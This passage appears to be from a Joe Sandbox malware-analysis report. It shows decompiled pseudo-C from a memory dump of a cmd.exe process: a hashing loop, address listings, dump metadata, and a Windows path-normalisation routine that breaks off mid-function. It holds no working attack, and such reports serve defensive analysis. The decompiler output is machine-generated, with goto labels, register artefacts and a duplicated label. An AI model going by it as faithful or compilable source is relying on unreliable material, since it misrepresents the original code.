								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E03CAE7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                                                                                                                          0x03cae833
                                                                                                                                          0x03cae839
                                                                                                                                          0x03cae83e
                                                                                                                                          0x03cae841
                                                                                                                                          0x03cae848
                                                                                                                                          0x03cae84b
                                                                                                                                          0x03cae851
                                                                                                                                          0x03cae8b2
                                                                                                                                          0x03cae8b2
                                                                                                                                          0x03cae8b5
                                                                                                                                          0x03cae90b
                                                                                                                                          0x03cae911
                                                                                                                                          0x03cae913
                                                                                                                                          0x03cae913
                                                                                                                                          0x03cae91a
                                                                                                                                          0x03cae91d
                                                                                                                                          0x03cae922
                                                                                                                                          0x03cae924
                                                                                                                                          0x03cae924
                                                                                                                                          0x03cae924
                                                                                                                                          0x03cae92f
                                                                                                                                          0x03cae933
                                                                                                                                          0x03cae935
                                                                                                                                          0x03cae93a
                                                                                                                                          0x03cae940
                                                                                                                                          0x03cae948
                                                                                                                                          0x03cae950
                                                                                                                                          0x03cae955
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae957
                                                                                                                                          0x03cae95c
                                                                                                                                          0x03cae9cb
                                                                                                                                          0x03cae9d2
                                                                                                                                          0x03cae9d4
                                                                                                                                          0x03cae9f2
                                                                                                                                          0x03cae9f6
                                                                                                                                          0x03caea10
                                                                                                                                          0x03caea18
                                                                                                                                          0x03caea1a
                                                                                                                                          0x03caea1f
                                                                                                                                          0x03caea2c
                                                                                                                                          0x03caea2d
                                                                                                                                          0x03caea2e
                                                                                                                                          0x03caea32
                                                                                                                                          0x03caea3d
                                                                                                                                          0x03caea42
                                                                                                                                          0x03caea45
                                                                                                                                          0x03caea51
                                                                                                                                          0x03caea60
                                                                                                                                          0x03caea65
                                                                                                                                          0x03caea68
                                                                                                                                          0x03caea6a
                                                                                                                                          0x03caea6a
                                                                                                                                          0x03caea6a
                                                                                                                                          0x03caea6f
                                                                                                                                          0x03caea76
                                                                                                                                          0x03caea7c
                                                                                                                                          0x03caea7e
                                                                                                                                          0x03caea81
                                                                                                                                          0x03caea85
                                                                                                                                          0x03caea88
                                                                                                                                          0x03caea8c
                                                                                                                                          0x03caea8f
                                                                                                                                          0x03caea93
                                                                                                                                          0x03caea98
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caea9a
                                                                                                                                          0x03caea9d
                                                                                                                                          0x03caeaa2
                                                                                                                                          0x03caeb0e
                                                                                                                                          0x03caeb15
                                                                                                                                          0x03caeb17
                                                                                                                                          0x03caeb33
                                                                                                                                          0x03caeb36
                                                                                                                                          0x03caeb39
                                                                                                                                          0x03caeb3f
                                                                                                                                          0x03caeb45
                                                                                                                                          0x03caeb4a
                                                                                                                                          0x03caeb52
                                                                                                                                          0x03caecb1
                                                                                                                                          0x03caecb9
                                                                                                                                          0x03caecbe
                                                                                                                                          0x03caecc3
                                                                                                                                          0x03caecc6
                                                                                                                                          0x03caeceb
                                                                                                                                          0x03caecee
                                                                                                                                          0x03caecf9
                                                                                                                                          0x03caecfe
                                                                                                                                          0x03caed00
                                                                                                                                          0x03caed05
                                                                                                                                          0x03caed07
                                                                                                                                          0x03caed0a
                                                                                                                                          0x03caed0c
                                                                                                                                          0x03caed0e
                                                                                                                                          0x03caed12
                                                                                                                                          0x03caed19
                                                                                                                                          0x03caed1e
                                                                                                                                          0x03caed24
                                                                                                                                          0x03caed2a
                                                                                                                                          0x03caed2a
                                                                                                                                          0x03caed2c
                                                                                                                                          0x03caed3e
                                                                                                                                          0x03caed3e
                                                                                                                                          0x03caeb5a
                                                                                                                                          0x03caeb62
                                                                                                                                          0x03caeb69
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeb6f
                                                                                                                                          0x03caeb75
                                                                                                                                          0x03caeb79
                                                                                                                                          0x03caeb79
                                                                                                                                          0x03caeb88
                                                                                                                                          0x03caeb8e
                                                                                                                                          0x03caeb90
                                                                                                                                          0x03caeb92
                                                                                                                                          0x03caeb97
                                                                                                                                          0x03caed3f
                                                                                                                                          0x03caed45
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caed4b
                                                                                                                                          0x03caed4e
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeb9d
                                                                                                                                          0x03caeb9d
                                                                                                                                          0x03caeb9d
                                                                                                                                          0x03caeba2
                                                                                                                                          0x03caebb5
                                                                                                                                          0x03caebbc
                                                                                                                                          0x03caebbe
                                                                                                                                          0x03caebbe
                                                                                                                                          0x03caebc3
                                                                                                                                          0x03caebc5
                                                                                                                                          0x03caebcb
                                                                                                                                          0x03caebd2
                                                                                                                                          0x03caebd5
                                                                                                                                          0x03caebdb
                                                                                                                                          0x03caebdf
                                                                                                                                          0x03caebe1
                                                                                                                                          0x03caebf0
                                                                                                                                          0x03caebf9
                                                                                                                                          0x03caec04
                                                                                                                                          0x03caec07
                                                                                                                                          0x03caec0a
                                                                                                                                          0x03caec82
                                                                                                                                          0x03caec85
                                                                                                                                          0x03caec8b
                                                                                                                                          0x03caec91
                                                                                                                                          0x03caec93
                                                                                                                                          0x03caec96
                                                                                                                                          0x03caec9b
                                                                                                                                          0x03caeca6
                                                                                                                                          0x03caecac
                                                                                                                                          0x03caecae
                                                                                                                                          0x03caecae
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caec0c
                                                                                                                                          0x03caec0c
                                                                                                                                          0x03caec0c
                                                                                                                                          0x03caec0f
                                                                                                                                          0x03caec12
                                                                                                                                          0x03caec15
                                                                                                                                          0x03caec15
                                                                                                                                          0x03caec18
                                                                                                                                          0x03caec1e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caec22
                                                                                                                                          0x03caec28
                                                                                                                                          0x03caec4b
                                                                                                                                          0x03caec5b
                                                                                                                                          0x03caec5d
                                                                                                                                          0x03caec63
                                                                                                                                          0x03caec65
                                                                                                                                          0x03caec68
                                                                                                                                          0x03caec6b
                                                                                                                                          0x03caec6b
                                                                                                                                          0x03caec70
                                                                                                                                          0x03caec71
                                                                                                                                          0x03caec74
                                                                                                                                          0x03caec7d
                                                                                                                                          0x00000000
                                                                                                                                          0x03caebe3
                                                                                                                                          0x03caebe3
                                                                                                                                          0x03caebe6
                                                                                                                                          0x03caebe6
                                                                                                                                          0x03caebe7
                                                                                                                                          0x03caebe9
                                                                                                                                          0x03caebec
                                                                                                                                          0x00000000
                                                                                                                                          0x03caebe6
                                                                                                                                          0x03caebe1
                                                                                                                                          0x03caeba4
                                                                                                                                          0x03caeba9
                                                                                                                                          0x03caebb0
                                                                                                                                          0x03caebb3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caebab
                                                                                                                                          0x03caebab
                                                                                                                                          0x03caebab
                                                                                                                                          0x03caebac
                                                                                                                                          0x03caebac
                                                                                                                                          0x00000000
                                                                                                                                          0x03caebab
                                                                                                                                          0x03caeb97
                                                                                                                                          0x03caeb19
                                                                                                                                          0x03caeb1c
                                                                                                                                          0x03caeb21
                                                                                                                                          0x03caeb26
                                                                                                                                          0x03caeb2c
                                                                                                                                          0x03caeb2c
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeb26
                                                                                                                                          0x03caead6
                                                                                                                                          0x03caead9
                                                                                                                                          0x03caeadc
                                                                                                                                          0x03caeadc
                                                                                                                                          0x03caeadc
                                                                                                                                          0x03caeade
                                                                                                                                          0x03caeae4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeaee
                                                                                                                                          0x03caeaf7
                                                                                                                                          0x03caeaf9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeb04
                                                                                                                                          0x03caeb12
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeb12
                                                                                                                                          0x03caeb06
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeb06
                                                                                                                                          0x03caeaf0
                                                                                                                                          0x03caeaf2
                                                                                                                                          0x03caeaf4
                                                                                                                                          0x00000000
                                                                                                                                          0x03caeaf4
                                                                                                                                          0x03caea6a
                                                                                                                                          0x03caea21
                                                                                                                                          0x00000000
                                                                                                                                          0x03caea21
                                                                                                                                          0x03cae9d6
                                                                                                                                          0x03cae9d6
                                                                                                                                          0x03cae9e0
                                                                                                                                          0x03cae9e2
                                                                                                                                          0x03cae9e2
                                                                                                                                          0x03cae9e8
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae9e8
                                                                                                                                          0x03cae987
                                                                                                                                          0x03cae98f
                                                                                                                                          0x03cae992
                                                                                                                                          0x03cae995
                                                                                                                                          0x03cae995
                                                                                                                                          0x03cae998
                                                                                                                                          0x03cae998
                                                                                                                                          0x03cae99a
                                                                                                                                          0x03cae9a0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae9a9
                                                                                                                                          0x03cae9b2
                                                                                                                                          0x03cae9b4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae9ba
                                                                                                                                          0x03cae9c1
                                                                                                                                          0x03cae9cf
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae9cf
                                                                                                                                          0x03cae9c3
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae9c3
                                                                                                                                          0x03cae9ab
                                                                                                                                          0x03cae9ad
                                                                                                                                          0x03cae9af
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae9af
                                                                                                                                          0x03cae924
                                                                                                                                          0x03cae8b7
                                                                                                                                          0x03cae8ba
                                                                                                                                          0x03cae902
                                                                                                                                          0x03cae908
                                                                                                                                          0x03cae90a
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae90a
                                                                                                                                          0x03cae8bc
                                                                                                                                          0x03cae8bf
                                                                                                                                          0x03cae8f9
                                                                                                                                          0x03cae8ff
                                                                                                                                          0x03cae901
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae901
                                                                                                                                          0x03cae8c1
                                                                                                                                          0x03cae8c4
                                                                                                                                          0x03cae8f0
                                                                                                                                          0x03cae8f6
                                                                                                                                          0x03cae8f8
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae8f8
                                                                                                                                          0x03cae8c6
                                                                                                                                          0x03cae8c9
                                                                                                                                          0x03cae8e7
                                                                                                                                          0x03cae8ed
                                                                                                                                          0x03cae8ef
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae8ef
                                                                                                                                          0x03cae8cb
                                                                                                                                          0x03cae8ce
                                                                                                                                          0x03cae8de
                                                                                                                                          0x03cae8e4
                                                                                                                                          0x03cae8e6
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae8e6
                                                                                                                                          0x03cae8d3
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae8d5
                                                                                                                                          0x03cae8db
                                                                                                                                          0x03cae8dd
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae8dd
                                                                                                                                          0x03cae853
                                                                                                                                          0x03cae855
                                                                                                                                          0x03cae85b
                                                                                                                                          0x03cae85d
                                                                                                                                          0x03cae897
                                                                                                                                          0x03cae89c
                                                                                                                                          0x03cae8a2
                                                                                                                                          0x03cae8a6
                                                                                                                                          0x03cae8ab
                                                                                                                                          0x03cae8ad
                                                                                                                                          0x03cae8ad
                                                                                                                                          0x00000000
                                                                                                                                          0x03cae85d

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6cb9cbfb1f58625554a1e92fcbdefe2bcd7662f5c79134e2e5214cf3f78638c5
                                                                                                                                          • Instruction ID: df53046cbb389a157eecac63ad0df949f92eca17757a2731c19f7622da1f464f
                                                                                                                                          • Opcode Fuzzy Hash: 6cb9cbfb1f58625554a1e92fcbdefe2bcd7662f5c79134e2e5214cf3f78638c5
                                                                                                                                          • Instruction Fuzzy Hash: 30029372E00A169FCB18CF7DC8956BEFBF5AF88204B59456DD456DB380D634EA01CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BF6E30 Relevance: .5, Instructions: 481COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E03BF6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x3cafca8);
				_push(0x3c217f0);
				_push( *[fs:0x0]);
				_t312 =  *0x3ccd360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E03C1FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E03BF74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E03C09BC6( &_v52, 0x3bb1080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E03C19377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E03C546A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M03BF749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E03BD52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L03BE2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L03BE2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L03C54735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E03C1BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E03C02010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L03C54658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E03C09BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E03BD52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L03BD83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E03BD52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L03BD83AE(_t428);
														L80:
														E03C09BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x3bb1080;
														_v72 =  *0x3bb1080;
														__eax =  *0x3bb1084;
														_v68 =  *0x3bb1084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E03C09BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E03BF746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E03C1B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
